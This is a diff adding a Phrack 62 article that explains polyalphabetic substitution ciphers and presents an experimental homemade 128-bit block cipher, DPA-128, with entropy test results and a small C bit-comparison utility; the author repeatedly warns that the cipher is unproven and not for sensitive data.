+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AA""")
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/14.txt b/phrack62/14.txt
new file mode 100644
index 0000000..2af4a8f
--- /dev/null
+++ b/phrack62/14.txt
@@ -0,0 +1,2112 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x0e of 0x10
+
+
+|=---------=[ A Dynamic Polyalphabetic Substitution Cipher ]=------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ Veins <veins at tristeza.org> ]=--------------------=|
+
+1 - Introduction
+  1.1 - First of all, a reminder. What is polyalphabetic substitution ?
+  1.2 - Weaknesses in polyalphabetic substitution
+
+2 - IMPLEMENTATION OF DPA-128
+  2.1 - DPA-128 used as a one way hash function
+  2.2 - DPA-128 used as PRNG
+
+3 - Acknowledgment
+
+4 - References
+
+5 - Source Code
+
+--[ 1 - Introduction
+
+   In Phrack #51, mythrandir discussed the cryptanalysis of monoalphabetic
+ciphers and basic substitutions and transpositions. This paper discusses a
+different substitution known as 'polyalphabetic substitution' and how some
+mechanisms can be implanted to take advantage of its characteristics. This
+document will then focus on 'dynamic polyalphabetic substitution' which is
+an evolution of polyalphabetic substitution with key-dependant s-tables.
+
+A "functional-but-still-work-in-progress" cipher will be presented.  It is
+a 128-bits secret-key block cipher that uses polyalphabetic s-tables which
+are highly dependant of the key. The cipher, DPA-128, consists in a simple
+function that makes 3 operations on the block. It is not a Feistel network
+but still respects Shannon's principles of diffusion and confusion. It has
+only been reviewed by a few people, so I strongly discourage its use as it
+has not proven anything yet. However, if you use it and have any comments,
+I'd be glad to hear from you, but remember, do not encrypt sensitive stuff
+cause someone will probably come, break the cipher and go spreading all of
+your secrets on IRC ;)
+
+Finally, just to clarify a few things. I use the acronym DPA (for "dynamic
+polyalphabetic algorithms") in this document to refer to key dependancy in
+polyalphabetic substitution. I've seen people using the term "dynamic" for
+ciphers that used polyalphabetic substitution in a mode that uses a pseudo
+random vector (CBC for example). While I'll keep using the acronym, assume
+that key-dependant substitution works in total abstraction of the mode and
+DPA-128 has an implementation of both ECB and CBC modes as I'm writing.
+Also, while I have not seen a dynamic polyalphabetic cipher implementation
+it does not mean that all of the ideas in this paper are new. DES had some
+variants that performed key-dependant substitutions by exchanging lines of
+s-tables, and several ciphers use one-way hash functions for subkeys.
+
+----[ 1.1 - First of all, a reminder. What is polyalphabetic substitution ?
+
+Polyalphabetic substitution is an hybrid between transposition and
+substitution.
+
+Transposition consists in reordering the characters in the plaintext to
+produce the cipher:
+
+Assume my secret message is:
+	  THIS IS MY SECRET MESSAGE DONT READ IT, ARAM SUCKS
+
+After transposing it in a 8 columns table, it becomes:
+	  T H I S I S M Y
+          S E C R E T M E
+          S S A G E D O N
+          T R E A D I T A
+          R A M S U C K S
+
+The cipher is produced by reading the columns instead of the lines:
+	   TSSTR HESRA ICAEM SRGAS IEEDU STDIC MMOTK YENAS
+
+
+While substitution consists in interchanging the characters in the
+plaintext to produce the cipher:
+
+Assume my secret message is:
+	  THIS IS ANOTHER ATTEMPT TO PRESERVE MY PRIVACY
+
+Substitution alphabet is a simple rearrangement:
+	     A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+	     Y Z W X U V S T Q R O P K L M N I J G H E F C D A B
+
+The cipher is produced by replacing the letter in plaintext by the new
+letter in the rearranged alphabet:
+	  HTQG QG YLMHTUJ YHHUKNH HM NJUGUJFU KA NJQFYWA
+
+Note that both these methods do not even require a key, the parties that
+wish to share the secret, have to share the "protocol" which is the
+number of columns for the transposition, or the rearranged alphabet for
+the substitution. In practice, there are methods to use keys with both
+substitution and transposition but in the end, both are insecure with or
+without a key. I won't go through the description of how you can break
+these, the methods were described in phrack #51 if I recall correctly
+and they are so simple that some tv magazines use these on their game
+pages.
+
+Now let's get back to polyalphabetic substitution.
+A transposed substitution table looks like this more or less:
+
+    A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+    B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
+    C D E F G H I J K L M N O P Q R S T U V W X Y Z A B
+    D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
+    E F G H I J K L M N O P Q R S T U V W X Y Z A B C D
+    F G H I J K L M N O P Q R S T U V W X Y Z A B C D E
+    G H I J K L M N O P Q R S T U V W X Y Z A B C D E F
+    H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
+    I J K L M N O P Q R S T U V W X Y Z A B C D E F G H
+    J K L M N O P Q R S T U V W X Y Z A B C D E F G H I
+    K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
+    L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
+    M N O P Q R S T U V W X Y Z A B C D E F G H I J K L
+    N O P Q R S T U V W X Y Z A B C D E F G H I J K L M
+    O P Q R S T U V W X Y Z A B C D E F G H I J K L M N
+    P Q R S T U V W X Y Z A B C D E F G H I J K L M N O
+    Q R S T U V W X Y Z A B C D E F G H I J K L M N O P
+    R S T U V W X Y Z A B C D E F G H I J K L M N O P Q
+    S T U V W X Y Z A B C D E F G H I J K L M N O P Q R
+    T U V W X Y Z A B C D E F G H I J K L M N O P Q R S
+    U V W X Y Z A B C D E F G H I J K L M N O P Q R S T
+    V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
+    W X Y Z A B C D E F G H I J K L M N O P Q R S T U V
+    X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
+    Y Z A B C D E F G H I J K L M N O P Q R S T U V W X
+    Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
+
+This is known as the "Vigenere Table", because it was invented by Blaise
+Vigenere (a French mathematician, if you care). Unlike transposition and
+substitution, a key is required.
+
+Assume my secret key is:
+          BLEH
+
+Assume my secret message is:
+	  LAST ATTEMPT
+
+The ciphertext is the intersection of each character of the secret key with
+each character of the secret message. Key characters are seeked on the very
+first line, and message characters are seeked on the very first column.
+Since the key is shorter than the message, it is padded with itself so that
+it becomes:
+	BLEHBLEHBLE
+
+If it was longer, then either the message would be padded with random crap
+or the key would be truncated (this is more common).
+
+The cipher is obtained by replacing a letter in the message by the
+intersection of current message character and current key character in the
+table. The secret message becomes:
+       MLWABUXLNAX
+
+As you may notice, even though a character may appear two or more times in
+the plaintext, it is not encrypted the same way in the ciphertext depending
+on which character from the key is used for the substitution. This is what
+"polyalphabetic" means in "polyalphabetic substitution". It was known for a
+while as the "unbreakable cipher" and a variant was used successfuly during
+Second World War by the Resistance against the Germans.
+
+While this sounds stronger than transposition and substitution, it is still
+very weak and unless a RNG is used to generate a key that is as long as the
+data to encrypt (one-time pad), it is possible to recover the key size, the
+key itself and/or the message with enough data to analyze. The methods used
+to break this kind of cipher is out of the scope of this paper but a search
+on google will give you enough hints ;)
+
+Polyalphabetic tables have three interesting properties:
+    a) f(a, b) == c
+       f(a, b) == f(b, a)
+       but... f(a, c) != b
+       and assuming c = f(a, b), then there is a f1 such as f1(a, c) == b
+
+    b) using the ASCII layout, there are 256^2 combinations which will
+       produce 256 possible results (including the original character).
+
+    c) if we assume that the key is truly random AND has the same size
+       as the message to encrypt, then all results are equiprobable.
+
+and equiprobability means that:
+  - if you only take one character in the ciphertext, then you have as
+    many chances for it to be any cleartext character. They all appear
+    the exact same number of times in the table and are the result of
+    as many combinations each.
+
+  - there is no "useless" substitution. If substitution of character 'A'
+    results in character 'A', then it is not considered as a useless
+    substitution as it had as many chances to be out than any other.
+
+
+----[ 1.2 - Weaknesses in polyalphabetic substitution
+
+        As I previously said, the above cipher is weak. The weaknesses are
+numerous and mostly related to the cipher leaking informations about the
+cleartext, the key and/or the substitution table. If one can encrypt data
+using the same key, he can determine the size of the key with one message
+and determine the structure of the substitution table with another, giving
+him all the necessary information to understand the ciphertext and any
+other ciphertext encrypted using the same key. But don't get this wrong,
+he doesn't HAVE to be able to encrypt data, this is just a convenience ;)
+The fact that the key is concatenated to itself does not make a change,
+and actually an implementation on computer would work on data using a
+modulo on the size of the key to save memory.
+
+The reasons why it is so easy are described here:
+        - if one chooses a key A and a key B such as they only differ by
+          one bit, then the ciphertext will only differ by one byte.
+
+        - if one chooses a message A and a message B such as they also
+          only differ by one bit, then the ciphertext will differ by one
+          byte.
+
+        - if one changes one bit in ciphertext and decrypts it, the
+          resulting message will only differ by one byte.
+
+        - if one has partial knowledge of the key, or of the message,
+          then he can determine which substitutions are not probable and
+          therefore reduce drastically the complexity of an attack. Also
+          partial knowledge of the key or the message gives statistical
+          analysis a chance to break the ciphertext when polyalphabetic
+          substitution had all the characteristics needed to prevent that
+          from happening.
+
+So... let's sum things up. Polyalphabetic substitution as described above
+is vulnerable to chosen texts attack, known texts attack, key correlation
+attack and eventually statistical attacks. Oh... almost forgot... any
+partial information reveals information about other unrelated data. If I
+partially know the plaintext, then with access to the ciphertext I am
+able to recover partially the key, with partial knowledge of the key and
+access to the ciphertext, i am able to recover partially the plaintext.
+There is not one point of failure, there are only points of failures...
+
+
+----[ 1.3 - Theory of information
+
+	Shannon described two properties that a block cipher should have
+in order to be strong. Not that all ciphers respecting these are strong,
+but those that do not respect it are most likeley weak.
+These properties are 'confusion' and 'diffusion'. The first one is what
+we achieve with polyalphabetic substitution, incapacity to deduce from a
+single encrypted byte, with no other information, the result of which
+substitution it is. This is because of the equiprobabiliy polyalphabetic
+tables gives us. The second is diffusion, which is lacking from the
+above cipher, and one of the reason why it is so vulnerable.
+Diffusion is a characteristic where a minor cause produces a major
+result. It is sometimes called 'cascading effect'.
+
+Basically, diffusion should ensure that a one-bit change in the key
+alters the whole ciphertext, that a one-bit change in the plaintext
+also alters the whole ciphertext and that a one-bit change in the
+ciphertext alters the whole plaintext. This complete alteration is
+only in appearance, and a better look at the complete ciphertext
+would reveal an average of half bits modified as you'll notice in the
+output of `bitdiff` later in this paper.
+
+While it is difficult to decide wether or not a cipher has a
+correct confusion and diffusion, they both produce an entropic result that
+can be measured using several methods. These methods will be used in this
+paper but explained further in the references. A cipher not producing true
+entropy is weak, true entropy (== white noise).
+
+One way to add confusion is to ensure that the ciphertext is not dependant
+of the key on a character basis. Changing one bit of the key should change
+the whole ciphertext. This can be achieved by the use of a one-way hash
+function for key generation. Some one-way hash functions have properties
+that make them suitable for use, these are:
+     h = f(M)
+     - no matter the length of M, h has a fixed size
+     - assuming M, it should be easy to compute h     
+     - assuming h, it should be difficult to compute M
+     - a one-bit change in M alters half the bits in h (in average).
+     - it should be hard to find a M' to a fixed M such as f(M) = f(M')
+     - it should be hard to find any M and M' such as f(M) = f(M')
+
+The two last properties seem to be identical but in practice it is "easier"
+to produce a random collision, than to produce a collision for an expected
+output. Assuming h is 128-bits long, finding a particular collision takes
+at most 2^128 tries, while finding a collision takes at most 2^64 tries.
+This is known as the anniversary attack.
+
+The use of such a function will make key correlation hardly practicable as
+choosing two keys that have a relation will result in subkeys that have no
+relation at all, even if the relation is a single bit difference. I am not
+even mentionning attacks based on partial knowledge of the key ;)
+
+Also, this will prevent users from choosing weak keys, purposedly or not,
+as it will be difficult to find a key that will produce a weak key
+(assuming that there are weak keys ;) once passed throught the one-way hash
+function. By weak key, I do not mean keys like "aaaa" or "foobar", but keys
+that will produce a subkey that introduces a weakness in the encryption
+process (such as DES's four weak keys).
+The function not being reversible, partial knowledge of plaintext and
+access to ciphertext does not reveal the key but the subkey from which you
+cannot obtain information about the key. If the algorithm iterates for
+several rounds, it is possible to generate subkeys by calling f on previous
+subkey:
+
+	round1:		f(k)
+	round2:		f(f(k))
+	round3:		f(f(f(k)))
+	and so on...
+
+Note that there is nothing that prevents an implementation from precomputing
+the subkeys for better performances (this is what my implementation does)
+instead of computing them for each block.
+The characteristics remains, knowing the subkey for round3 does not give
+information about the subkey used for round2 or round1. That is one of the
+failure points plugged ;)
+Finally, this will increase confusion by creating a relation between each
+single bit of the user input key and each byte of the ciphertext.
+
+Unfortunately, this is not enough. We added confusion but even though it
+is theoritically not possible to retrieve the key, even by having access
+to the full message and the full ciphertext, it is still possible with a
+partial knowledge to retrieve the subkey and to decrypt any data that is
+encrypted with the original key. This is where diffusion comes into play
+with a method called 'byte chaining'. Byte chaining is to a block what
+block chaining is to a ciphertext, a propagation of changes which will
+affect all subsequent data. This is done with a simple Xor, where each
+byte of the block is xor-ed with the next one (modulo size of the block
+to have the last one be xor-ed with the first one). That way, a single
+bit change in a byte will have repercussion on every byte after that one.
+If the function used to encrypt data is called for more than one round,
+then all bytes are guaranteed to have been altered by at least one byte.
+This operation is done before encryption so that the result of an
+encrypted byte is dependant not only of the current byte but of all the
+ones that were used for the byte chaining. As rounds occur, cascading
+effect takes place and the change propagates through the block.
+
+It is possible to increase complexity by using a key-related permutation
+before encryption. DPA-128 uses a key-related shifting instead but this
+can be considered as a permutation in some way. Some functions known as
+'string hash functions' can compute an integer value out of a string.
+They are commonly used by C developpers to create hash tables and they
+are pretty simple to write. It is possible to use these functions on a
+subkey to create a key-related circular shifting within the block:
+   - we have a subkey for the round that we computed using f, this subkey
+     is hashed to produce an integer. the hash function does not have to
+     respect any constraints because of f properties. the paranoiac could
+     implement a function that has low collisions and a nice repartition
+     but since it is applied on the result of f, it inherits some of its
+     characteristics.
+
+   - assuming the block size is 128, we reduce that integer to 128
+     (7 bits) there is no magic stuff here, just a modulo.
+
+   - the result is used to shift the block circularly >>>
+
+Note that the key-relation for the shifting has no more security than
+a simple byte shifting - at least on Vigenere table - but only adds
+more confusion. It was initially introduced as a security measure for
+substitution tables that had not equiprobable results.
+It prevents elimination of some substitution combinations by analyzing
+which bits are set in an encrypted byte when you know its plaintext
+equivalent. From the ciphertext, it is not possible to determine wether
+a block was shifted (the hash value of the key could have been 0 or some
+product of 128, who knows ;) and if it was shifted, it is not possible to
+know where the bits come from (which byte they were on originally and
+what was their position) which makes it difficult to determine if the
+bit of sign on a particular byte is really a bit of sign or not and if it
+was part of that byte or not. Also, the shifting is dependant from the
+subkey used for a round so it will be different at each round and help
+diffusion through the byte chaining phase.
+
+Finally, it is possible, using the same method, to create a relation
+between a subkey and the substitution table. This is where dynamic
+polyalphabetic substitution comes into play !
+
+As we've seen, a polyalphabetic substitution has 256^2 substitutions
+with 256 outcomes. This means that if an attacker would want to try
+all combinations possible, he would have to try 256 combinations
+for a character to be sure the right couple was used (if he knew the
+structure of the substitution table, or 256^2 otherwise). It is
+possible to increase that value by creating a relation between the key
+and the substitution table. There are 256 characters, so it is possible
+to create 256 different tables by shifting ONE byte on each line:
+
+	instead of:
+	0 1 2 3 4 5 6 7 8 9 ...
+        1 2 3 4 5 6 7 8 9 ...
+        2 3 4 5 6 7 8
+        3 4 5 6 7 8
+        4 5 6 7 8
+        5 ....
+	...
+
+	we end with (n being the shift):
+	n%256	  (n+1)%256 (n+2)%256 (n+3)%256 (n+4)%256 (n+5)%256 ...
+	(n+1)%256 (n+2)%256 (n+3)%256 (n+4)%256 (n+5)%256 ...
+	(n+2)%256 (n+3)%256 (n+4)%256 (n+5)%256 (n+6)%256
+	(n+3)%256 (n+4)%256 (n+5)%256 (n+6)%256 (n+7)%256
+	(n+4)%256 (n+5)%256 (n+6)%256 (n+7)%256 (n+8)%256
+	(n+5)%256 (n+6)%256 (n+7)%256 (n+8)%256 (n+9)%256
+	(n+6)%256 ...
+	...
+
+This means that an attacker would need to try 256^2 combinations
+before he knows for sure the right combination was used. he needs to
+try the same combinations as before but with every variation of 'n'.
+'n' can be computed using the same method as for the block shifting
+but since there are 256 possible shifts for the substitution table,
+then the result will be reduced modulo 256 (8 bits).
+
+The tables being structured in a logical way, they can be represented
+by arithmetics which removes the need to store the 256 possible tables
+and saves quite a bit of memory. It is also possible with more work to
+create polyalphabetic s-tables that are shuffled instead of shifted,
+such tables would still share the characteristics of polyalphabetism
+but prevent partial knowledge of the table from deducing the full
+internal structure. I did not have enough time to keep on working on
+this so I am unable to give an example of these, however, simple
+tables such as the one above is sufficient in my opinion.
+
+k being the character from the key, d being the character from the
+message and s being the shifting.
+        encryption can be represented using this equation:
+        (k + d + s) mod 256
+
+        while decryption is:
+        ((256 + d) - k - s) mod 256
+
+The amusing part is that when you play with statistics, you get a very
+different view if you are in the position of the attacker or of the
+nice guy trying to keep his secret. Assuming there are 'n' rounds, then
+you have (256^2) * m substitutions useable where 1 <= m <= n and n <= 256.
+This is because some subkeys might produce identical substitution tables.
+In another hand, and im not doing the maths for this ;), the attacker has
+not only to figure out which substitutions were done, but also the tables
+in which they were done... in the exact same order... out of data that
+does not inform him on the subkeys used to generate the tables he is
+trying to determine the structure of ;)
+
+The result is NOT equiprobable, because it would require exactly 256
+rounds with different tables which is hardly doable (just determining
+if it is doable requires trying 2^128^256 keys if im correct), but
+from the attacker point of view, even an exhaustive search might
+create an indecision because many keys will probably result in the
+same cipher if applied to different messages (many will produce the
+same cipher if applied to garbage too ;).
+
+--[ 2 - IMPLEMENTATION OF DPA-128
+
+As I said, DPA-128 is a secret-key block cipher. Its block and key size
+are 128-bits. This is not a limitation imposed by the algorithm which
+is easily adaptable to different key and block sizes. It consists of
+16 rounds, each performing:
+   - a byte chaining;
+   - a subkey-related shifting;
+   - a subkey-related polyalphabetic substitution;
+All of the rounds have their own subkey.
+The implementation uses all of the ideas explained in this paper and
+before I provide the code, here are a few tests performed on it.
+
+
+----[ 2.1 - DPA-128 used as a one way hash function
+
+Bruce Schneier explained in "Applied Cryptography" that some ciphers can
+be turned into one way hash functions by using them in BC modes (CBC for
+that matter) using a fixed key and initialization vector with more or
+less efficiency. It is hard to determine if DPA-128 is efficient because
+it was not been analyzed by many people and I consider it as efficient
+to produce checksums as to encrypt. If there is a weakness in the cipher
+then the checksum will not be secure. The same applies to DPA-128 used
+as a PRNG. So... I did some testing ;)
+
+I used three tools, the first one 'bitdiff' is a little utility that goes
+through two files and compares them bit per bit. It then outputs the
+number of bits that have changed and the repartition of zero's and one's.
+A sample output looks like this:
+
+% ./bitdiff file1 file2 
+64 bits have changed.
+ratio for file1:
+        0's: 55
+        1's: 73
+
+ratio for file2:
+        0's: 71
+        1's: 57
+
+
+I also used a tool 'segments', which counts segments of identical bits in
+a file. A sample output looks like this:
+
+% ./segments file1
+0's segments:
+        1 => 19
+        2 => 6
+        3 => 4
+        4 => 0
+
+1's segments:
+        1 => 13
+        2 => 7
+        3 => 3
+        4 => 3
+
+
+Finally, I used an existing tool called 'ent' which is available at
+   http://www.fourmilab.ch/random/
+
+which performs several entropy tests, helping determine:
+
+      - if DPA-128 passes deterministic tests and how does it compare to a
+        PRNG (I used NetBSD's /dev/urandom).
+      - what is the impact to a checksum when a bit changes in a file.
+
+Theoritically, an equiprobable cipher would not be a nice idea for a
+one-way hash function as it would be easily subject to collisions, but
+as I explained, the result seems to be equiprobable while there is a
+limited range of possible substitution for a fixed key.
+
+I checksum-ed /etc/passwd three times, the first one was the real file,
+the second one was the file with a one bit change and the third one was
+the file with a 6 bytes addition. All bytes where affected, tests with
+bitdiff showed that a one bit change produced an average of 60 bits
+modified in the 128 bits checksum.
+
+% ./dpa sum passwd |hexdump
+0000000 be85 3b72 1a76 48e6 5d08 939b 104f 3f23
+0000010
+
+% ./dpa sum passwd.1 | hexdump
+0000000 f9d3 c5fe d146 2170 144d 900d 0e99 c64b
+0000010
+
+% ./dpa sum passwd.2 | hexdump
+0000000 fa19 4869 3f61 798a 2e81 91e9 bc92 78ee
+0000010
+
+
+After i redirected the checksums to files, i call bitdiff on them. The
+files do not contain the hexadecimal representation, but the real
+128 bits outputs:
+
+% ./bitdiff passwd.chk passwd.1.chk 
+63 bits have changed.
+ratio for passwd.chk:
+        0's: 65
+        1's: 63
+
+ratio for passwd.1.chk:
+        0's: 68
+        1's: 60
+% ./bitdiff passwd.chk passwd.2.chk
+61 bits have changed.
+ratio for passwd.chk:
+        0's: 65
+        1's: 63
+
+ratio for passwd.2.chk:
+        0's: 64
+        1's: 64
+
+You'll notice a nice repartition of zero's and one's, lets' see what
+segments has to say about this:
+
+% ./segments passwd.chk 
+0's segments:
+        1 => 13
+        2 => 10
+        3 => 3
+        4 => 2
+
+1's segments:
+        1 => 15
+        2 => 4
+        3 => 5
+        4 => 0
+
+% ./segments passwd.1.chk
+0's segments:
+        1 => 11
+        2 => 8
+        3 => 5
+        4 => 3
+        5 => 0
+
+1's segments:
+        1 => 13
+        2 => 9
+        3 => 2
+        4 => 0
+        5 => 1
+
+% ./segments passwd.2.chk
+0's segments:
+        1 => 12
+        2 => 10
+        3 => 3
+        4 => 1
+        5 => 0
+
+1's segments:
+        1 => 16
+        2 => 3
+        3 => 4
+        4 => 3
+        5 => 1
+
+Well all we can notice is that there are mostly small segments and that
+they are well reparted. I'm skipping the entropy test since it will
+illustrate the use of DPA-128 as a PRNG ;)
+
+----[ 2.2 - DPA-128 used as PRNG
+
+For the following tests concerning segments and entropy:
+- the file 'urandom.seed' consists in 1024 bytes read from NetBSD 1.6.1's
+  /dev/urandom
+- the file 'dpa.seed' consists in the result of an ECB encryption on dpa's
+  main.c and a reduction of the output to 1024 bytes.
+
+This means that while tests on urandom.seed apply to the result of a PRNG,
+the tests on dpa.seed can be reproduced. It shows good entropy on
+encrypting a fixed value and the results should be quite the same if used
+as a PRNG. The tests that are performed by 'ent' are described on their
+website, I'm not going to describe them here because it is out of the
+scope of this paper and I would do it far less better than their
+page does.
+
+% ./segments urandom.seed
+0's segments:
+        1 => 1019
+        2 => 418
+        3 => 212
+        4 => 88
+        5 => 35
+        6 => 18
+
+1's segments:
+        1 => 1043
+        2 => 448
+        3 => 179
+        4 => 74
+        5 => 32
+        6 => 13
+
+
+% ./segments dpa.seed
+0's segments:
+        1 => 1087
+        2 => 443
+        3 => 175
+        4 => 72
+        5 => 29
+        6 => 18
+
+1's segments:
+        1 => 1039
+        2 => 453
+        3 => 195
+        4 => 67
+        5 => 34
+        6 => 15
+
+% ./ent -b urandom.seed 
+Entropy = 0.999928 bits per bit.
+
+Optimum compression would reduce the size
+of this 8192 bit file by 0 percent.
+
+Chi square distribution for 8192 samples is 0.82, and randomly
+would exceed this value 50.00 percent of the times.
+
+Arithmetic mean value of data bits is 0.4950 (0.5 = random).
+Monte Carlo value for Pi is 3.058823529 (error 2.63 percent).
+Serial correlation coefficient is -0.002542 (totally uncorrelated = 0.0).
+
+
+% ./ent -b dpa.seed 
+Entropy = 1.000000 bits per bit.
+
+Optimum compression would reduce the size
+of this 8192 bit file by 0 percent.
+
+Chi square distribution for 8192 samples is 0.00, and randomly
+would exceed this value 75.00 percent of the times.
+
+Arithmetic mean value of data bits is 0.5000 (0.5 = random).
+Monte Carlo value for Pi is 3.200000000 (error 1.86 percent).
+Serial correlation coefficient is -0.003906 (totally uncorrelated = 0.0).
+
+
+% ./ent -bc urandom.seed
+Value Char Occurrences Fraction
+  0             4137   0.505005
+  1             4055   0.494995
+
+Total:          8192   1.000000
+
+Entropy = 0.999928 bits per bit.
+
+Optimum compression would reduce the size
+of this 8192 bit file by 0 percent.
+
+Chi square distribution for 8192 samples is 0.82, and randomly
+would exceed this value 50.00 percent of the times.
+
+Arithmetic mean value of data bits is 0.4950 (0.5 = random).
+Monte Carlo value for Pi is 3.058823529 (error 2.63 percent).
+Serial correlation coefficient is -0.002542 (totally uncorrelated = 0.0).
+
+
+% ./ent -bc dpa.seed
+Value Char Occurrences Fraction
+  0             4096   0.500000
+  1             4096   0.500000
+
+Total:          8192   1.000000
+
+Entropy = 1.000000 bits per bit.
+
+Optimum compression would reduce the size
+of this 8192 bit file by 0 percent.
+
+Chi square distribution for 8192 samples is 0.00, and randomly
+would exceed this value 75.00 percent of the times.
+
+Arithmetic mean value of data bits is 0.5000 (0.5 = random).
+Monte Carlo value for Pi is 3.200000000 (error 1.86 percent).
+Serial correlation coefficient is -0.003906 (totally uncorrelated = 0.0).
+
+
+The last tests must have given you an idea of the confusion, diffusion and
+entropy present in a DPA-128 encrypted ciphertext. More results are
+available online on my webpage, I just did not want to put too much in
+here since they all look the same ;)
+
+--[ 3 - Acknowledgment
+
+I would like to thank a few people:
+  k` who helped me with previous versions and some parts of dpa-128,
+  acid, who supported my endless harassement (hey try this please !),
+  pitufo for being the first dpa-128 tester and benchmarker,
+  hypno for reading this and spot bad sentences :)
+  br1an for reading this also and giving advices,
+  a ph.d whose name will remain private who audited dpa-128
+  and mayhem who both suggested to write a paper about dpa.
+
+
+--[ 4 - REFERENCES
+
+     . http://www.tristeza.org/projects/dpa/
+       my page for the dpa project with examples and a lot of testing
+
+     . http://www.csua.berkeley.edu/cypherpunks/
+       cypherpunks
+
+     . http://www.fourmilab.ch/random/
+       entropy tests and their description
+
+     . http://www.schneier.com/paper-blowfish-fse.html
+       a paper on blowfish and what features a cipher should provide
+
+     . "applied cryptography", Bruce Schneier
+       THE book ;)
+
+--[ 5 - Source Code
+
+All of the code is provided under the ISC license, do whatever you want
+with it, but please please don't use it to encrypt sensitive data unless
+you know what you are doing (that means you could not break it and have
+confidence in your skills). The code is NOT optimized for speed, it is
+a work in progress and many parts can be improved, i'm just a bit in a
+hurry and by the time you read this, it will probably be a lot cleaner ;)
+
+If you plan on using dpa-128 even though I'm still warning you not to,
+here are a few recommandations:
+
+     - the following code accepts keys both as parameter or as file. It
+       is preferable for many reasons to use a file, but the best reason
+       (aside from someone issueing a `ps` at the wrong moment...) is that
+       you can have your key be the result of a PRNG:
+
+       % dd if=/dev/urandom of=/home/veins/.dpa/secret.key bs=1024 count=1
+
+       The odds of someone guessing your key become pretty low :)
+
+
+     - use CBC mode. the impact of using CBC mode on performances is too
+       low to be an excuse for not using it.
+
+       To encrypt:
+       % dpa -a enc -m cbc -k file:secret.key -d file:/etc/passwd -o p.enc
+
+       To decrypt:
+       % dpa -a dec -m cbc -k file:secret.key -d file:p.enc -o p.dec
+
+
+/*
+ * Copyright (c) 2004 Chehade Veins <veins at tristeza.org>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* bitdiff.c */
+/*
+ * This is a small utility to compare the bits in two files. It is ugly
+ * and could be rewritten in a sexier way but it does its job so no
+ * need to waste time on it ;)
+ *
+ */
+#include <sys/stat.h>
+#include <sys/mman.h>
+
+#include <fcntl.h>
+#include <sysexits.h>
+
+int	main(int argc, char *argv[])
+{
+  int	i;
+  int	size1, size2;	/* size counters */
+  char	*s1, *s2;
+  int	s1_0, s1_1;	/* in s1: 0s and 1s counter */
+  int	s2_0, s2_1;	/* in s2: 0s and 1s counter */
+  int	fd1, fd2;
+  unsigned int	cnt;
+  unsigned int	diff;
+  unsigned int	total;
+  struct stat	sa;
+  struct stat	sb;
+
+  if (argc < 3)
+    return (EX_USAGE);
+
+  fd1 = open(argv[1], O_RDONLY);
+  fd2 = open(argv[2], O_RDONLY);
+  if (fd1 < 0 || fd2 < 0)
+    return (EX_SOFTWARE);
+
+  fstat(fd1, &sa);
+  fstat(fd2, &sb);
+  
+  size1 = sa.st_size;
+  size2 = sb.st_size;
+
+  s1 = mmap(NULL, sa.st_size, PROT_READ, MAP_PRIVATE, fd1, 0);
+  s2 = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd2, 0);
+  if (s1 == (void *)MAP_FAILED || s2 == (void *)MAP_FAILED)
+    return (EX_SOFTWARE);
+
+  s1_1 = s2_1 = s1_0 = s2_0 = diff = total = 0;
+  while (size1 && size2)
+    {
+      for (i = 7, cnt = 0; i >= 0; --i, ++cnt)
+	{
+	  if (((*s1 >> i) & 0x1) != ((*s2 >> i) & 0x1))
+	    ++diff;
+
+	  if ((*s1 >> i) & 0x1)
+	    ++s1_1;
+	  else if (((*s1 >> i) & 0x1) == 0)
+	    ++s1_0;
+
+	  if ((*s2 >> i) & 0x1)
+	    ++s2_1;
+	  else if (((*s2 >> i) & 0x1) == 0)
+	    ++s2_0;
+
+	  ++total;
+	}
+      ++s1; ++s2; size1--; size2--;
+    }
+
+  if (diff == 0)
+    printf("bit strings are identical\n");
+  else
+    {
+      printf("%d bits have changed.\n", diff, total);
+      printf("ratio for %s:\n", argv[1]);
+      printf("\t0's: %d\n", s1_0);
+      printf("\t1's: %d\n", s1_1);
+      printf("\n");
+      printf("ratio for %s:\n", argv[2]);
+      printf("\t0's: %d\n", s2_0);
+      printf("\t1's: %d\n", s2_1);
+    }
+
+  munmap(s1, sa.st_size);
+  munmap(s2, sb.st_size);
+
+  return (EX_OK);
+}
+
